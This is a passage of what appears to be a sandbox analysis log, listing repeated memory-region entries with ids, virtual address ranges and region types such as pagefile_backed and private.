pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21597 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21599 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21600 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21601 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21602 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21603 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21604 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21605 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21606 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21607 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21608 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21612 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21613 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21614 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21615 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21616 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21622 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21623 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21624 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21625 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21638 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21663 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21664 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21666 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21667 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21668 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21669 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21670 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21688 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21689 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21692 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21693 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21694 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21695 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21696 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21697 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21698 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21699 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21700 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21701 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21702 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21703 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21704 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21705 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21706 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21707 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21708 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21709 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21710 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21711 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21712 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21713 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21714 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21715 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21716 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21717 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21718 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21719 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21720 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21721 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21722 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21723 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21724 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21725 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21726 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21727 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21728 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21729 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21730 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21731 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21732 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21733 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21734 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21735 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21736 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21754 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21755 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21759 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21760 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21761 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21762 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21763 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21764 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21765 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21766 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21767 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21768 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21769 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21770 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21776 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21777 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21782 start_va = 